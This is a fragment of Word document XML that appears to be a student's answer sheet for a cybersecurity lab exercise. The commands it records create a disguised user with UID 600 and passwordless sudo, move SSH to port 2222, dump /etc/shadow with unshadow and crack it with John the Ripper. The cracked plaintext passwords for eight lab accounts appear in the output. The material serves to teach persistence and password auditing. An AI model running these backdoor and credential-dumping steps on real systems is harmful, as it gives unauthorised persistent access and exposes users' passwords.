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b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_54mbflbxksj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- </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">useradd -rMo -u 600 sysd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- passwd sysd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- usermod -u 600 sysd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- groupmod -g 600 sysd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9025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- visudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="43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sysd ALL=(ALL:ALL) NOPASSWD:ALL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 Your bash commands here </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- cat /etc/sudoers | grep -i sysd | awk '{ print $3 }'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76900" cy="400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 Your bash commands here </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- sudo nano /etc/ssh/sshd_config</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018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- systemctl restart ssh.service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- exit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- </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh sysd@192.168.6.105 -p 2222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  <w:t xml:space="preserve">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sudo su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-  ssh sysd@192.168.6.105 -p 2222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  <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unshadow /etc/passwd /etc/shadow &gt; passwords.txt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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- john passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:spacing w:after="240" w:befor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Loaded 8 password hashes with 8 different salts (crypt, generic crypt(3) [?/64])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:spacing w:after="240" w:befor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Press 'q' or Ctrl-C to abort, almost any other key for status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computer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(stallman)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freedom</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(babbage)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trustno1</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(mitnik)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dragon</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(lovelace)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lakers</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">(turing)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passw0rd</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(sysadmin)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Goodluck!</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(student)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p4ssw0rd</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(sysd)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216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cd2U, Inc. brand. All Rights Reserved.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